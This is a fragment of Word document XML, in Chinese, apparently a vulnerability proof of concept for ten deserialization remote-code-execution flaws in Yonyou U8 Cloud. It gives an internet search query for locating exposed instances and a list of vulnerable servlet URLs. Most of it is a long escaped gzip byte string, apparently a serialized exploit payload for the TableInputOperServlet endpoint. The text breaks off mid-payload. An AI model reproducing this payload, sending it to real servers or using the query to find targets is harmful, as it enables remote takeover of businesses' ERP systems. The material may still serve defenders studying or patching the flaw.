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 xml:space="preserve">用友U8 Cloud </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>处反序列化RCE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Cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案。用友U8 Cloud存在多处（TableInputOperServlet、LoginServlet 、FileTransportServlet、CacheInvokeServlet、ActionHandlerServlet、ServletCommander、MxServlet 、MonitorServlet、LoggingConfigServlet、ClientRequestDispatch）反序列化漏洞，系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作，结合系统本身存在的反序列化利用链，最终造成远程代码执行。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app="用友-U8-Cloud"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0515" cy="2356485"/>
            <wp:effectExtent l="0" t="0" r="444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隐患url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/service/~iufo/com.ufsoft.iuforeport.tableinput.TableInputOperServlet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/servlet/~uap/nc.bs.sm.login.LoginServlet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/service/~iufo/nc.ui.iufo.server.center.FileTransportServlet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/service/~iufo/com.ufsoft.iufo.web.appletinvoke.CacheInvokeServlet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/service/~uap/com.ufida.zior.console.ActionHandlerServlet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/service/~tbb/nc.bs.ntb.plugin.ServletCommander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/service/~iufo/nc.bs.framework.mx.MxServlet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/service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet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/service/~iufo/nc.bs.logging.config.LoggingConfigServlet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/service/~iufo/nc.ui.iufo.jiuqi.ClientRequestDispatch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/service/~iufo/com.ufsoft.iuforeport.tableinput.TableInputOperServlet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20327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\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xcd\x7b\xcb\x8f+\xebvW\xdf\x7d\xeeU\xc8\x09\x2877R\x14\x89\x01\xad\xcd\xa4;g\xd3m\xbb\xdd\xbd\xbb\xb3u\x80\xf5\xd5\xcb\xe5g\x97\xcb\xcf:\x8a\xa0\\\xae.\xbb\xab\xecr\xbb\xca.\xdb\x87\xc3\x00\x09Eb\x94\xc1\x0d\x11B\x02\x06\xcc\x80H\x88A\"\x10B\x11\x03\x06\x88H0!\x0acD\x06 \xc1_\x00\xbfUew\xbb\xdd\xbd\xf7\xd97\x08\x89\xad\xed.\xbb\xbe\xf5\xad\xe7o=\xber\xf7?\xfd\x1fG?\x8a\xe6G\xbfto/\xed\xb3E&lt;\x0e\xceJv42\xdd\xf8_\xca\x7f\xfb\xb7\xff\xee\xef\xff^\xf1\x8b\xa3\xa3\xd5,\xf9\xb3GGGo\xfe\xca_=\xe2\x7f?\x00\x7d1\x9c\x7bg\xf6\xccvF\xee\x99\x13N&amp;\xe14\xc25\x08\\'\x1e\xf3\x7b\xdf]/\xed`\xe1\x9e\xb5\xc6\xee\xb0f\xcf\x94i&lt;_\xff\x9d\x7f\xf6\x9f\xfe\xfe\xcd\x1f\xfc\x85\xff\xf2\xe6\xe8M\xf5\xe8\x0b\x90\xc4G?\xa9\xb2\xe0\xf3\xc0\x9ez\xe7\x8d\xc1=\xb6\x7f\xc0\xd2\xc4\x9e\xc5G\xbf\x98-\xb1N\xe7\xe0\xf0a\x85\x7b_\xdc\x85!\xa4\xff\xda\xf7H\xc7\xfe\xb3\xaa\xbdYc\xdb\xf4\xbf\xfe\xf4o\xfd\x83\xf5\x8f\x7f\xfa\xc5\xd1\x0f\xaaG?wg;q8\x87\xdcwU\xb08\xcfX\x9coY\x9c\xef\xb18o\xcd\xedit\x17\xce'\xee\x1c\x92!\xf3\xd7\xbfG\xe6\xddb\xca\xbc\xa33id\x8f\xa7\xeep\x8fA\xee\xdf\xfd\xce\x7f?\xd9\xfc\xce\x0f\xdf\x1c\xfd\xe0\x9b\xa3?7\xde[\x89\xe2\xa3\xbf\xf4\xcd\xcf\xa6\xcab\xbe\xdd\xf2\x29e\xf6\xb7\xfc\xeb\xce\xaf\xfd\xaf?*\xfe\xea\xdf\x7b\xc3\x81D\xf8~\x08c&gt;|\xb61\xf8\x14\xdb\xd3x\x8fao\xf9[\xbfDo\xfe\xf9O\xdf\xb0G\x7f~\xbc\xa3x8\xfa\x9bG_\xacf\xcb\xf9\xd11\xc7mu\x169\xf3\xf1,&gt;3\xd3\x8b2\xf5\xe0\x94\x9a=\xb5=w~\xf4\xf4\xefgs\xad&gt;]\x86\xbe;\xdfS\xe67\xff\xe4\x7f\xfb\xdf\xfe\x8d?\xbc~s\xf4\xc57G?\x1a\xd3\xdc\x83K\x7f\xf9\x9b\xd7P\xf5\x0b\xe3\x9a\x1b\x8f\xc2a\xdd\x9e\xb8\xcf\x81g\xc6\xf3\xf1\xd4\xfb\xf0\x0dHn\xed\xb9=i\xadg.\xd8\xfcd\x9f\x8d\x14\xd8Q\x94\xb9\x7f\xcb\xfe\x8c\xef\x9fm\xd9\xff\xd6\x1f\xf6\xfe\xe1\x8f\xa3\xd3`\xe7\xe4\xa3\xf8\xe8\x17\xa6n\xa2\xa7\xbeq\\\xec\xfa\xc9\xfe\xae\x8c\xdb?\xf9\x95\xff\xfc\xbb\xff\xfe?X\x8f\x919\x8a\xd8\x89\xbf\xbc\xe0\x9f\xbf\xca\x89\x16\x1f\xbd\xb9\x87\"\xbf\xe8\xb9[\x07\x8a5k\x9f\x12\xfcy&amp;\x80\xb7\x7f\xfc\xc45\xb3\xe3\x1f\xfd\xcf\x7f|\xbd\xf9\xf0/D\xca\xf5\x05\xc7\xe2%\x12\xf1\xf8\xdb/\x8f\x8f\x83\xd0\x1e\x9e\xbc\x9d\"\xdb\xc3\xf9\xf4\xd7'\xe1f\x1c\x04\xf6_\x83\xffgv|v\x1f\xbd=\xfd\xf0\xe5w\xc7\x8e\x1d;\xa3\xe3\x13\xf7\xf4\xf8\xdb\xef\xbeL\xe3\x80\x88\x1cC\x9f\xf64\xb2\xef\xdc\x93S\xe6\xb4\xb4\xe7\xc7\xf1\xc8\xcdneN&gt;\xfe\xfa\xf8\xc0\xda3\x04\x8c\x95?y\x1b-\xa6g\x93q\xe4\x9ce\x1b\xde\x9e\x9e\x81\x9f\xec:\x81=w\x87\xea\xd8\x0d\xa0\xd6#;V\xe3\xf8\x90\xfbY\xe4\xc6\xe48n\x14\x8d\x07\x81\x7b\x12\xcf\x17\xee\xe9\x87c\xd0\xcd\xddx1\x9f\xbe \x07\xff\x93\xe9\"\x08\xd8\xa4'+\xe6\xee$\\\xba\xa9r\x12c\xef\x04\x1al6\x8f\x16-R\x0e0d\xcf\xda\x0f\xdb\xb5\x94\x92\xa6\xe1t=\x09\x17Q\xca\x02\x84\xd9\x8e\xb3\xa1\x7b\x87P=_\xcdx\xbf\xfb\xa8O\x0e\x162\x9f4\xdd\x28\\\xcc\x1d\x97\"D\xd6\xb5''o\xb3]\xce\x96\x04\xf7\x86\x14\x04b\x1d\xbb\xd1\xc9\xe9\xbb\xad\x85\x99\x86s\xf7n\x9b?\xb2\x1d\xdb\xa9W\xa1\xe1+z\xbf\xe2\xfc\xe7\x7b\xb3\x08lm\x9b-\xe2\x0c\xf1[\x83\xb6\xb7\xc3\xf4^\xba\xbdqw\x87\xe8\x9c\xbc\"\xffQ\xc3\xbd\x18\x0c\xd63\xe8\xd0|$V\xc7A\xec\xceON\x8f\xbf\x7daG\x963\x0c\x86-\x80\x8f\x0f\x17?\x05\xba\xfb\xa1\x7f6\x9e\x82\xf7\xd4\x0e\xce\xb6\xfb\xce\x9e\xe4fF&gt;\xe1\x7d&gt;\x0f\xe7\xa7?\xbb\x14\x86\xf6G\x99\x7f\x1e\xae\xa2H,\xee\xee\xdc9\x08\x0e\x04\xbf\x0e\x89'1\x1f\xc1\xc5KD\xfcL\xc0=P\xe2\xdd\xbe\x8e\xef\x8e\x9fa\xee\x8e\xa3\x9cE\x10\x9dw\x87\xb9\x8f\xc9\x7d\x05x\xcf\x19\xbc\x7dd&lt;I\xd3\xf8\xff\x86\xf3\x01\x87\x8c\xf5\xf8\xee\xf8\xe4\x15\x9dy;\xb7\x80\x93\xd3\xb3qD\xa81\xde\xd4F\x99Q\xe7\xe1\xe4\xe4\xd3\x09\xfc8?\xa5\"Nw\x00z\x91;/|\xba\xa5@\xb3\x88\xc7\xce~\x1a\xbd\xa2\xde\xe9\xbbO\xa0\xfc\xa5\x16lM\xda\xa3\xe7\x0bn\xa20j\xaf/\x9d\x9c&gt;B\x93\x9d\xf1\x9a\x9f\xff\x7f\xf2\xc6k\xfa\xfd?r\xc7\x8b\xe6\xf0\xf9\xa5\xfby\x85\x7b\xde\xaa\xec\xc7\xb7\x99\xf1\xa7\x99O&gt;U\x17\xb2U\x283\x9f\x8f\x87\xee\x0e\xfb\x9f\xa1\xce\xae\x10\xd1\x81\xccW\x1b\xee\x8e\xff\xdb\x7d\x99\xa9\xd7\x9f\xea\xc3\xcb*\xffL\xab\xed\xce\xa7\xf8\x8a0\x0c\\\x7b\xfa\xc2\xe8w[\xce\xef\x8e\xb3\xce\xbd\xef\xae\xac\x06e\xa5g\xc0\x05\xec\xb1\x1f;\xc1\x06\xaap\xc1\xd9\x95\x05\x08\x8fx\xcf\xbe7\xccu\x1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4\xbb\x136\xf0v\x1e\xce\xdcy\xbc\xde\xbadK\xfcTT\xbe\xb7\x0eW1 \xa5u\x18\x08\xc9$L\xdd\xf8\xac\xdd\xacJO\xab'\xaf\xb8\x7b&gt;\xb7\xd7\xcfP\xf5\xe9Xm\x99\xbe\x05\x90s\x19\xfe\xd0\xe02XpNn\xf5&gt;\x8bf\xc18&gt;y\x7b\xf6\xf6\xf4\x9b\xdco\x1c\xff\xe5\xaf\x8f\xf3\xf9]F\x1d\x7f\xb4\x8df\x11\xd9\xf3\xe9\xf7Og\x07\x0b\x99\x99\xcf!\x9319y\xbb\xc7\xf7\xed'\xb2\xf0\x1b\x01\xdb\x9eVuta\x1c\x02\xceZ\xfd[e\x7f\xd7\xfe\xfd\xad\xe2\xcfs\xe7\x85\x19[\xaa\xf3\xf3\xe3\xff\xf6\xaf~\xfbO\xfe\xcdo&gt;\xa7?N\x173\xd4\xbc\xd8\x8aY\x80\x8f\x12'\x7b\x81~w\x9c\xe2\x0dQ\xd8\xbe;\x0b\xdc\xa9\x17\x8f\xb6R\xbes\x83\xc8\xdd\xf9\x9b12\x9b\x87\xf1v\xc2\x09'8\xf2\xed\x03%r\x9d\xc5|\x1c\xaf\xcfn\x0f\x88N^\x92H\xe1\xd05\xd3\xa6\x9e\xce\xa8\xfb.\xf9\xd3B\xea\x91\xb7\x83\x048\x93\xf0c|7\xc6h\xe3nA\x96\xf5\xedw\xc7\xcf\xac\xff\xe67\xb6\x96\xee\x9c\xf6l*\xc822\xdb\xf6\xba\x9f\x0e\xd8\x1d\xbag\xe7F\xae\xaf\xe9\x94\xb5\x1d\xb22\x97\xa6\xef\xcff8\xbf\xc4fl;&gt;\x8ex\xce6\x1f\xbf\x83x;\x08\xd6\xbba,\x9d\xf0\xa1aV\xa9\xf7gI;r\xaf\x8a\x00\x29\x1c\xda\x0ay\xfa9A\x99\x7f\x1a%\x07\xf1\xb3\xe4\x1a\xc4\x9fuH\x11d*;\xae\x9c\x07\xcf\xda\x05\x9c\xc3\xf7\xb3i\x28\x95\xf6a\xcf\xbe\xd3ow\x8d\x95ee\xb5kk\xef\xa3\x16\xdf\xa7\xc7S\x0b\x13\xa9y/4\xc8\xf2\x92\x95\x7bT\xe7Q\x91CU2u&gt;S\x9b=\xa1\x7f\x0a!\xaf\xd8\xfciC_\x7d\x06\x00Qg\x03\x84\x7f\xbe\xfe\x98\xf9\x07\xca|\xf7t\x08\xe4p\x7f\xf7eZ\xcdA\xf1\xf5\xdb\xf5\xf2\xeaj\xe9\x11\x91\xac\x88\x89\x17R\xc9\x93b\xc9\x132U\x8a\x15Rj4O\xd2\x7b\x89D\xd2J\xf2\xc8\xa1\xaa^\xa1j\x8db\x0a\x29J\xa4\xbcH\xa4BJ_ut\xaa\xb4+$\x29\xb4 \x8f\x16\x06^\x9eC\x8b\xc4\xa3%&gt;/\x0d\x87\x96\xcc\x9f\xa4s\x89d\xc2K\x88D\x96\xa4\x84\xbaT\xabU\xa9f\xd0\xca\x88hE\xb2\x86\xb5\x12^:\xd6\xcb\xa9\xccZX\xa2ZT\xa1ZB\x1b\xf0\xdd\x80\xef\x06|s\xd0\xe1&gt;\x91\x9b\xa0\x19Q]\xd7\xa9^+S\xdd\xa0\xbc\x11R\x9e\xe4.x\xf4$O\xba\xa5\xbaW!\x91P\x01\x7b\x0b\xd8[`\x9bHv\xb0&gt;\x84\x0c\x17\xd7;\xbc\xbcTVC\x29QCOm/\x82\xee\x92\xe4&gt;\xd6\x82TF\xa3\xafS\xc3Im\xbc\x82MW\x90\xa3\x1b\xf2C*\xa3\x11a-I\xd7\xdeC\xce\x7b\xcfg\xdd\x96\x92'\xb7\xe9\x96\xca\xa4_\xd35|p\x0d\x1f\x18\x89\xbcI\x7dvk\xc0g\xe0y\xdb\xc6\xab_a\x9a\x1b\xd8\xf5Uf\xd7%t\xbb\x02]\x8dn\xa3\x12\xdd\x82\xb7R\xa4s#]\xfb\x0a\xf7\x1bt\x7b\xcd\xf7\x04\x81\xbe\xe5\x29BbW\x1b\xac\x7b\"\x28a\xdd\x14E\"E\x95&lt;E##\xd5[H\xe4\x09\xc9\xc0\xcb\xc3+q\xa0DH=#\x8d\xf9\x90\x8c\x9cN\x06\xe2\xae\xe6\x04a]N&lt;\xa1\x80^\x01\xbd\xe2\x85BI\x946x\xb5\xa8\xd9.Q\x13\xfa6\x1d\xa1a\xbfM\x8a\x0596x\x84\xd4D\x9c4\x0f\xb1L\xef;\xa0\xefQ3\x97\xd2\x96\xc0\xb3\x04\x9e:\xa5\xbcF\"Q\xc6\xd8\x93#\xb3V\xa1\x92\xc1\xbc\x84\x9a\x28~v\xcfH\xef\x95\x8dP\x94=e\x0a&gt;\x132\x11G\xd3\x17\x15\xe8R1\x14\x12\x06\xed\xfe\xadS\x7f\x9aQ*\xa7\x0a\x9d\x86\xc4\xb6*q\xea\x13\xb3\xa8\x93y\xadS\x8b*\xc0\x87\xa8\xa5&gt;T\xd6X\xdf\xe0\x95\xc3+\x8fW\x01\x18\x9f\xe1z\x01\xbd\x8ad\x00\x91\xbe\xdaj\xb6\xfa\xb9^\xae\xae\x1b\x9dr\x0b\xf7\xcc\x966\x1b\x0d'\xcar\xa0\xa9\x0bk\x7d\xd3\x1a\x96\xca\xb3\xc1\xc4y\x8f\xb5\xbaQ\xb8Y8\x17\xcd\xd1`\xda\xec\xf6\xbb\xab\xbc\x05\xbf5\xa0'M\x82\x04\xeb\x8a\xa3\xdd\xac\xa1\x17$\xae\x1e\xfa=kT-\xacF\xd8\xbb4\xbb\x979\xab;\x0c\x9c\xfb\x08\xb1\xec_\xdb\xdd\xcb\xd9P\xe6\xb8\xd6\xc2J\xa7\x8fkS\x1e\x14\x9a\x01x\xdc\xb6\xb4`a\xb5/\xf3\x83n9p\x82\xe6\xa8?Y\xf1\xfdJ\xb37\xba\xb7z\"gw\xa1C\xa2\x90\xd4]-\xfb]\xec\xd3\xd4\x0d\x7f.\x9b\x98\xf4'j\xa1o\xdeD\xfd\xee\xe5\xb4\x9a\xaf\xe7\x9c\x09xm\xa2\xd9\x81M\xd9\x9e\x0d\xeb\x12\xb4\xec\xeep\xd1\xef5\xf3\xce\xa4-H\xf2\xc2\x8f\xd9_i?\xb7\xc9\xc0\xd5\xb9\xa8]W\xee\x8b\xec\x1b\xd5\x29\x95\x97n\xc9\x07\x8f\xfeg\xf3h_4\xd7\xf0\xc5\xb4\x01\xfdEo\xb8\xb6\x7b\xa9\x0f\x8a\x15\xe5#t\xb9\x8f\xdc_\x07\x1f\xb3\x1d6\xce\xee\x07Zg\xe4\x04b\xe4L\xd4\x98\xe3d\xf5FA\x9fe^\x94\x83\xe1\xa4\xb3v\x0al\xbb\xf3Q\xbdM\xf3S\xfc\xeb\xeba\x97ci\xf9V\xb7\xbe\xb44\xf0\x12\x9f\xf0A'\x968\x9e\xed\xc2\x0d|^\x0f\x9a\x93 \xb2\x18\xeb9%W\x9d\xa4\x7bjTvhB\x89hx\xca\x7b\x99\x94kj\xe5j\xd4*\x8a\xdbT\xe7f\xe8L:#\xabT\xabQ\x1b\x29b8\xc2\xf0\x12a$\xaa\"\x93\xaaR\x1bx\x12\xf5\xc1\x81\xfc\xb6]*\x07\xfd\xae\x01~j\x89\xda\x1e\xf6\xfa\xc2\xf4\xc0O\x1b\xe5\x86%b\xfds\xfd^yj\xf5\x0c\xec/?\xf7\xf3\xb4\xb3\x18L\xd4\xf1\x80m\x03\x9d\xad\x05\x9b\xb2\xcc\x7b\x86!\x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fc\xe1\xc3\xbfk\xd8\xe4&gt;\xf3Q\xee\x12\xf1\xe9\xdc\xdb\x8a5\xb3\xba+\x7f\x1f\xbf\xd0\xa1J\xadk\xe65\x1dh7\xe3~7\xe18%\xce\xe4\x064\xf5\xcd\xe0\xa2\xbc\x01\xbf\xc6\x96_~\xa8\x05Q5\xb7\x9a9\x17\x06\xf4ND\x0b6\xb7`s+Q\x0d\xf0jRGO\xe3`\xf5\x14\\c\xd8\xd04\xc1'\x19\x14.7\xec[\xb9\xf0\x0a\xfe\x93D\xb4\x13\xb5\x0d9\xc6s\xbdo\xc6\xf6\xa4s?$Gt\x8cDt&lt;\xb5\x07\x9a\xb2U\xe8\xe4L\xe0\xc8\xcal5^\xc5\x03\xe2C\x85zlQ\x82\x0a%\x8d\xa0[\x9f:&gt;\xe7\xd9\x06:\xb5\x86\x9a\x9a\x1b\xf6j%\xea\x845\xeaD\xa2\x87\x18\xf7\x0c\xd5\x05?\x1f6O\xab\x135\xe9w\xeb\xa1e^\xe6\x06\x85\xfc\x7d\xbfg,\x86\xbd\xe6l ]\x8e\x87\xdd\xfe\xc2\x98\x069\xab]\x0f\x87\xdd\xcb9:\xacCe\xe0\xa2s-\xda\x88\xa3T\xaa\x07C\xa5|9\xd4:\xec;\xa9\x9b\xd3k\xe8\xbc\xa2\x83z$\x0a\xcde\xe7\xa2&lt;\x1b\xa6\xd8\xac?\x8b\xed~\\\xb0\xaf\x95\xd9u\xb9\xb0\xbb\xd7[y\xe5\xbc5\xb1\x02\x87\xb1R\x1a\xae\xfb=\x02_\x85\xa6\xf0\xab\xfeZ]A\xdc\x87\x8a\xb5\x84\x8e\x871\x1fS\x17\xb6w\x81/b\x1ema\x81\xa7\xa2\xd5\x97\x83n\x1e\xba\x18\xde`r\x93\xd35\xd4&gt;-\xc1\xba#L\xd6\xdd\xac\xdd\xeb\xeb\xda=\xf6\x87\xd4\xf5kT1\x28\xe4\x9a\xdb\x82\x0f\xbb\xa1\xb0\xe1s\x7d\xf2\xc4\x03\xb9Q\xb0z\xe5\x8de\x8appQ\x07?k\xe9L\xf2\xa3\xa1$\x02gZ^:c\xce/8\x1c\xb1\x1d\x90\x1a\xc3\x8f\x1d*s\xce\x88g~\xe9h\xa3\xb5\xd5U\x7d\xac\xf7\xa8[\x84\xack\xe4$\xebc\xf8e\xc9\xf0\xb9WX\x9c\xbb\xa6\x98 v1b\xe5A\xeezp\xa1#\xee\xd2\x98*5\xd8\xd9!\x03\x904\x80\x87\x99!\x8d\xb8\xe7lq3\x1b\xaco4\xbb\xbb\x0aR\xfe=\xe4\x92\x18m\xe5\x07\xcbj\xce\x9a!\xa7n\x11\xfbd\xc8\xb8Is7\xc7uA8FB\x0f\x86\xf4\x90\xca\xe8!\xc6\xbdZZ+\x86\x28\xbc\xf0Q&gt;\xcd\xed^\x1f\xbe\xc3\xbdD\xe5&gt;W\x1a\\\xd48\x7fc\x0by\xe3\xc2n\xd7K\xb1\xf9\x1e\xb4\x9c7\x17vZ\xbf\x9a\x09\xd7R\xc6N\x95?\x8b\xe1\xab\xb5\xd6\x98v\xa0[\x13xH\xc4\x1d\xa97\\\xfbu\x29\xbf\xd0e\x8e\xab\xbeL\xeb\xaaI\xf1P\xc2\xf8\x06^N\x81e\xe8q\x1f\xb3\xc8\x1d\xefI4\x9e\x0e\x03\xea\xc31B\xcdd\\t\x80\x91d\xd9.\xd4!\xeb\x12\xbc\x1d\xe1\x81\xd6K4%\xf5O\x9f\xebN\xd9\xe9C\xf7\x91\xa7\x95\xd2\x9cg;\xfb\x9e\x18\xc1\xce\xb1!\xf5\xd9\xcej\x015v|\xb3\xb1S\xcc#\x0f\xa5\xcb\xc0\xd5\xda\xc0L[\x8c\xbd\xbd:0\xe9\xe4\x90\xb3\xcb~!\x0e\x86\x88M\x90hU\x994\xf0\x83\x8f\xfbE\xd1F\xee\xdf\xa3&gt;\xf8\xa45q\xdf$\x0b3\xa3\x85z[\xd1E\x00y\x81\xa1uq\xbf\x87\xfb\xb0!\x8f\xba\x83\xfc\x98\xd6\x03]\xeb\x14\xd1\x03P\xaf\xda;,D\xba\x96\xdfXk\x8aoa\xcf\x04\xae\x82\x9e\x02s\x1b\xa6\x90\xc7\xde\xe3\xa5\xfd\x08&gt;\x00\x96\x96\xf6\x1a\xf8\xb4|\x01|\xd2\xcc\x938\x1e]\xe7\xa2\xb3\xa8N\xf23\xa7P[\xecf\x96\xa6\xd6\xb9\xe7\x99\x81\xf3RF&lt;\xfa\x85\x1b\x7f?W\x95,7w\xf5C\xea\xf7\xeaA\xfd\x9ec4\xe3\xfa\xa8d\xbd*\xade\x93\x83\xda\x03\xbe\xf9\x98kgu\x92\xd2\xdcW'\xdc\xbb\xd4\xb5k\xee\xf3\x29\x8b:\xfcl`\xfc4rM\xb5\xe9\x0fu\xb3=\xab\xb6\x94|\xa3\x95\x17\xcdvPow:V\xaf\xab\x06v\xbf[\xbe\x07\x9f\x89U\x18\xcd\xecI\x1c\x0d\xba\x97K\xa7\xa4\xae1K\xe5\x87\xd3a\xd1\xed\x85I\xad\xa5o\xea2\x10\xb0\xf1.+k\xee\x0d\xf9\xfb!|hav\xda\xe5\"tmW\xa4\xc3^\xbc\xed\x872\xf7\xe2K\xb6m\xdb\xeb\x9a%\xf4\x93\xbc\x03\x1d5\xd3;\x9c\x81\x9e\xd3\xa4\x7bG\xbc\xf7q\x9eR\xd6/\xf6&lt;\xcdMB\xec|\x18\xa1g\x06\xd6\xb6\xc7A\xbf\xf8\xa3\xb3\xcb\xe1\x8c\x82\xf8[\x98\xed\xfa\x17\xc6\x123@0\xd0\x0c\x9e\xa3z\xdfC\xc3~\xe1^\"\xfa\x85z\xe0\\\xd4g\xdb\xf9P\xa9\xa8\xe1\xac\xe3q\xff\x19\x06&lt;\x83\x96\xc7\x07\xf3\xe0\xae\xaf\xc9/\xe6\xc1\xdb\xfed\xc62X~\x89\xfb\\+\xad\x15\x0a\xe1`qH\xbb?\x0f\xeb\xc0\xdc\x02=m6\x98\xa2\xd6\x89\xe8p\xe6\x91mM]\xb7\x0b\x9d\xd5\xb0\xdbY\xf4\x0bm\xcc&gt;!\xeb?M\x7ba\x0f\xf5x\xc2\xfe\xabs\xbf\xd2y\xf6\xc3|\x96C\xce\xa4\xf3\xd3\xe3\xac\xb8\xad\x0d\xe6\xd3:\xcb6\x9f\xcf\x06\xe8S\xbd\xf2h\x88\xf9\x9bm\x80\xdcMk\xd2\x29\xb2\x1f\x08q\xec\xa6s\x0ejA\x89g\x1b#&lt;\x9cC[\x85\xf2\x03b\x99k\xa4s5\xfc\xa7\xe4\x83\xa16ZZ\x8co\xe9csu|8c\xed\xf0q\xe83`\xd7\x8a\x98\x7f5\xb7\xe5\xcbx\x7b\xac\xf7\x99\x0e\xc0\xf0\x045\xff~\x28\xdd\xd4\xe1\x9fpP\xe0X\xa3\x0fL\xad\xa5\xcd\xf3\xa9\xec\x1f\xfa\xf71n\xdd\xdcG\xec9\xc4\xdc\x13\x06vx\x97\\\xf6+\xd7l\xc4\x1a3\xc3SM&gt;&lt;\xbb\xb0\x0f\xd5\xa6\xd5Vx\x86P\x0f\xf8fqL\xe7\xf8\x0bk4\x28u\x82V\xa1\x9f\xc6\xf1\xc5\xec\x9c\x0b\x80\x99\x0ed\xa7q\xac\xa2\x16_@\xc6\x068b\x8c0\xef\x83\xdcz\x8a\x85\x28\xa0\x97\xfb\x97\xa3A\x97\xe9:Y\xbe\x16\xa0_o\x94\xcb\xce#\x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>f5\xda\xa0\xa0\xfa\xe0\x8du\xffE\x9c\x0fhX~\xe75;Z\xda\xcdn\xce\xd3\xac\x9e\x9a\xc7Y\x8f1\xda9\xcc\xed=?\xdb\x9c\x83in o\xa4i\x9dg\xe9\x9c\x93\x1fb\xe6B\xff\x13\xedO\x9c\x078':\x1bG[\xcd\xd2\xbc]\x7f\xfc\x1cw\x18\xe7\xfd\xf3\x93T\xc2\xf9\x06=\x88\xe3\xf5\x9a\xae\x7bu\xa8\xccu\xe6\xc5\xfa\xd3\x8c\xff&gt;;\x93v8&amp;\xe9yV\xfd\xc4\xd9\x92k\x8e\xf2\xb4\xfe8\xd7@N\x97g\x83\x8a\x1aK[~\x13\xe0\"\xeb\xcd\x88-f3\xae[:rv\xe7\x0b\xd0\xdcL\xd3\xda6\xc5&lt;WB?\xec\x88Q\xea?\x1a\xa2\xc7\x0a\xc8\xe6=B9\xd4\xdd\x28\x8cp\xbeC=\xecu\x82\x01\xceT\x87\xe7\xc4\x17\xeb\x9f:/\x1e\xcc\x81\xed\x8b\x00~\xe8\xf0\xb9\xb1\xca\xb5\xb1\x8ds\xae\x03l\x0c\xf9\xacKqn\x90[-\x87\x85\xce\xda\x28\xa8\xe9YC\xa0\x8fb\x7d\xc1x\xad~\xfe\x99|\xeb\x83\xa14\xecb\xa6\x04\x7f\x8e\xa9\xd2\x7dFcb\xa6F-\xcc\xa7\xcf\x03R]\x103\xd4\xbf\xacV\xbf\xecq\x8f\xf4\xcc\xab\"\x8d\x0e\xeb\xd5\xc7\xcf\xe5\xb0\xb1_\xe8l\x7b\x9d\xfa\xfa\x1ax\xca\x13\xae\x95\xc1\xc2A\xac\x18_\xe8\xd1q\x8a\xad\xa7\x1e\xcdx\x28\x0f\xa6\"?T\xd9\xf6\x0e\x94`\x9eO\xcf\x19p\xce\xe0\x1a\xb3?\xe7n\xf1\xb7\xca;\x85\x0e\xea\xc0j6\xe8r\x7d\xd7?yF?\xec\x17\x8f\xb3\xe4\xfd\xe3\\\xa0\xa6\xf3\x7f\xb0\xd5\xc3H\xcfE\xe8\xa1M\xcci\xfe\xe7\xf1~\xd5?\x1f?\xeb\xa3\xf6q\x0e\xdc\xa6=\x15z\x1d\xf8\xa9\x7f\xe0\xa7\xc3y\xff\x7d\xd6\x17\xeb\xe8+7\x1b\x8b\xcfM\x8fg7&gt;#\xbc\xf0\x7b\x99\xd7\x90\x7b\xbbgF2\xf8\x97\xd3\xe7R&lt;\x1fq\x1e\xef\xf9\xfc\x15\x7d\x90W~\x9a\xcf\xa2WG\xbf\xea$\xd9\xbdl\xae\x90\xba\x9d\"z\xf4\xf6\xb9\x17&gt;O\xb2&gt;\x89z:\xb2\xb8n\xd3h\xf6\xf4\\\x8cF\xfc\xac\xb3\xe4\xf13\x82k\xc2\x88mS\x99p\xe6\xc2\xe7\xb2\xce\xcf\xf3$*\xd7\x88&lt;\xa9Mee\xfb\xb9M\x01?\xa7&amp;\x9f\xd0t\x7bT\xf6x\xdd\xe2'\xd7\xb1G\x1a\x09\xd0S\xa5Q\x99;D\x03\xac\xcd\xfbD\xb9d\x8e5E\xf1\xba\x05\xf4\xcaz\x95L\\\x9d\xa8\xf2\xbeO\x12\xc8qB&amp;\xa9]\x8c\x1b\x9ea\x89j\xb1 \x8cZA\x8c\xda\x9ajt\xc7\x10f\x09\xd1\xd6j\xf7aI3\xeeJD\xf6\x94\xfc\x9a%x\xef\x7d\xa8k\x86gJx/\x97C\x92\x9b\xbe\xaex\x05\xf0^\xdb\x29\xdd\xb8\x9d\xd2\x09\xa17X\xb7\x96\x99\x28\xb8\x96\xaa\xc2/\xe1\xaa7&lt;\xdf\x92\x1c\xe4\xc7eH\xe2\xc1\x91h\xe4\x97S=G\xd23=5c\x82\xabw%5w\xebZ\xba&gt;K\xa8\xdb\xf0BK\x1a@F\xb5O\x0ad\x29+\xbdy \xab\xfc\x28kG\xb7\xd2\xdb\x29\x8d\x8d\xa9W\x0e+\x19\x7f\xc3T\xb1&amp;\xfc\\\xc44b\x9d\xa4\xf4\x92\x1c\x96\x1f\xd7\x07\xaf\xac\xc3\x7fj\x84\xd7=\xf3y\xb8$\x81\xfa,\x87U\xcdX\xe0=jr\xd9\x17\x18y\xab\x0b\x83,\xe0\xe4J\x16~-\xb3\xe1\xe1\xc0\xc6uj#|X\xcf\xd6#yi\x90\x83\xf7C\xcd\xc8\xf1\x7b\x17\xef\xef\x1a^\xd1\x92\x07\xa9O=Q\xcdQ\x09Goe\xac\xb6\xb6t\x0a\xd3u\x8d\x9a\xa9\x07\x8d\x02\x89s\x04V\xb9\x92W\xfe\xed*!mv\xfeU\xb32\xf2oA\x7b\x8f\x97\xdf\x18\x91%\xcfS^\xc1\x8eW\xe4\xd1\xa4\x0d?\x96\x9a~#\xbd\x17\x80\xbf!\xeb\x0b\xa2iz?\xef&lt;\x28\xe3q\x81$\xffJi\xfa\xec\xeb\x07\xf6\xad\xd2\xd4\xe7b\xbe\xd3g\xd5\xea\x1a\xe6\x9a$\x0b\xd7nz\x05]\xa